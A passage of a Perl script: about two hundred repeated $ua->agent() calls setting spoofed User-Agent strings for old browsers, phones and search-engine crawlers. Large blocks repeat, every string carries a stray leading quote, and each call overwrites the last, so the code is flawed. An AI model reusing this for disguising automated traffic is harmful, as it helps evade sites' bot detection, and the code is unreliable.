  3095. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3096. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3097. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3098. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3099. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3100. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3101. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3102. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  3103. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  3104. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3105. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3106. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3107. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3108. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3109. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3110. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3111. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3112. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3113. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3114. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3115. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3116. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3117. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3118. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3119. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3120. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3121. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3122. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3123. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3124. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3125. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3126. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3127. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3128. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3129. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3130. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3131. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3132. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3133. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3134. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3135. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3136. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3137. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3138. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3139. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3140. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3141. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3142. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3143. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3144. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3145. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3146. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3147. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3148. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3149. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3150. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3151. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3152. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3153. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3154. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3155. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3156. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3157. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3158. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3159. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3160. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3161. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3162. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3163. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3164. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3165. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3166. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3167. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3168. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3169. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3170. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3171. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3172. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3173. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3174. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3175. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3176. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3177. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3178. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3179. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3180. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3181. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3182. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3183. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3184. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3185. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3186. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3187. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3188. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3189. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3190. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3191. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3192. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3193. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3194. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3195. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3196. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3197. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3198. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3199. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3200. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3201. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3202. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3203. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3204. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3205. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  3206. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  3207. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  3208. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  3209. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  3210. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3211. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3212. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  3213. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  3214. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  3215. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  3216. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  3217. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3218. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3219. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3220. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3221. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  3222. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3223. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  3224. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  3225. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  3226. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  3227. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3228. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  3229. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  3230. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  3231. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  3232. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  3233. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  3234. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  3235. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  3236. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  3237. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  3238. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  3239. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3240. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3241. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  3242. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  3243. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  3244. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  3245. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3246. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  3247. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3248. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  3249. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  3250. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  3251. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  3252. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3253. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  3254. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  3255. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  3256. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  3257. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3258. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3259. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3260. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3261. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3262. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3263. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3264. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3265. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3266. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3267. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3268. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3269. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3270. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3271. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3272. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3273. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3274. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3275. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3276. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3277. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3278. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3279. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3280. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3281. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3282. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3283. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3284. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3285. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3286. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3287. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3288. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3289. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3290. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3291. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
